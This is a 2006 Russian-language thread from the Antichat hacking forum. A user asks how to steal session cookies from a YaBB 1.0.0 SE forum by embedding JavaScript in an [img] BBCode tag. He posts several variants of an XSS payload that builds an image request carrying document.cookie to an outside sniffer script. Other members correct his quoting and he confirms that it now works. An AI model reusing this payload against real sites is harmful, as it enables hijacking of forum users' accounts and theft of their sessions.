HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

как выдернуть cookie yabb 1.0.0 se ?
  #1  
Старый 10.03.2006, 00:45
donetsk
Участник форума
Регистрация: 30.01.2006
Сообщений: 176
С нами: 10671796

Репутация: 29
По умолчанию как выдернуть cookie yabb 1.0.0 se ?

Есть форум на yabb 1.0.0 se
Как выдернуть кукисы через с форума через сниф встроенный в картинку?
пробую так:



Код:
[img]javascript:i=new Image();i.src='hxxp://antichat.ru/cgi-bin/s.jpg?"+document.cookie';[/img]
Не получается REFERER выводит ,а вот QUERY нет
подскажите как правильно вшивать в картинку скрипт чтобы отображались кукисы ?
 

  #2  
Старый 10.03.2006, 01:19
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
С нами: 11042306

Репутация: 2726


По умолчанию

hxxp:// - это что такое? ты там случайно strreplace не забыл?

а ещё тут - что это?
'hxxp://antichat.ru/cgi-bin/s.jpg?"+document.cookie'
у тебя начинается на ' а заканчивается "

Последний раз редактировалось KEZ; 10.03.2006 в 01:21..
 

  #3  
Старый 10.03.2006, 10:21
donetsk
Участник форума
Регистрация: 30.01.2006
Сообщений: 176
С нами: 10671796

Репутация: 29
По умолчанию

KEZ

hxxp -это для отвода поисковых систем чтобы не находили описание на форуме!
Имеется ввиду конечно http://

вот пробую вот так:

[img]javascript:i=new Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie';[/img]

или вот так:
[img]javascript:i=new Image();i.src="http://antichat.ru/cgi-bin/s.jpg?'+document.cookie";[/img]

вот так:
[img]javascript:i=new Image();i.src="http://antichat.ru/cgi-bin/s.jpg?'+'document.cookie';[/img]


пишет QUERY=document.cookie

Всё равно кукисов нету
REFERER выводит ,а вот QUERY 100% что-то с кавычками двойными\одинарными

Последний раз редактировалось donetsk; 10.03.2006 в 10:25..
 

  #4  
Старый 10.03.2006, 10:36
Гаврила
Постоянный
Регистрация: 24.10.2005
Сообщений: 343
С нами: 10812683

Репутация: 134
По умолчанию

Ну вот ты сам подумай.Если ты двойную или одинарную кавычку открыл,как думаешь,её закрывать нужно?И зачем ты document.cookie в кавычки берёшь?
 

  #5  
Старый 10.03.2006, 10:58
donetsk
Участник форума
Регистрация: 30.01.2006
Сообщений: 176
С нами: 10671796

Репутация: 29
По умолчанию

всё спасибо понял
Просто не знал про куисы - всё работает спасибо
 

  #6  
Старый 10.03.2006, 22:19
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
С нами: 11212166

Репутация: 182


По умолчанию

Ну раз все понятно то тема закрыта
 
Закрытая тема



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Открытое письмо журналу "Хакер" TheFile Болталка 34 31.01.2009 21:03
Как восстановить нечитающийся Cd? novichok "Железо" 8 02.05.2007 12:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.